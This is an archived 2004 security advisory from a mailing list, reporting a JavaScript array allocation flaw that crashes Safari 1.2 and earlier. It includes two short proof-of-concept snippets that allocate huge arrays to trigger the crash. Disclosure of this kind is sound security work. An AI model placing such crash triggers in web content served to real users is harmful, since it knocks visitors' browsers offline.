lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <404A4566.7050508@insecure.ws>
From: kang at insecure.ws (kang)
Subject: Safari javascript array overflow

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

http://www.insecure.ws/article.php?story=2004021918172533

A problem exists in the way Safari Javascript engine allocates Arrays.
For example, allocating a too big array and writing into it, will
segfault Safari. There is no known way to execute remote code with this
vulnerability as the date of this advisory.
Konqueror doesn't seems to be vulnerable.


- --

Adv: safari_0x03
Release Date: 06/04/04
Affected Products: Safari =< 1.2
Impact: Denial of Service, Possibly exploitation
Severity: Remote, medium.
Vendor: Notified (19/03/04)
Author: kang, kang@...ecure.ws


Simple allocation management error trigger:

~    var a = new Array(99999999999999999999999);
~    a[0+5]="AAAAA";


Another possibilty...;)

var bam = new Array(0x23000000);
bam.sort(new Function("return 1"));


There are some other possibilities :>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFASkVmxt5Ja4aWvZMRAtG7AKCOz+licSBi/NpYe4qNu4YX468mCACdF4LA
DOrzcVourknKaBqvWFAlaQI=
=VISk
-----END PGP SIGNATURE-----


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ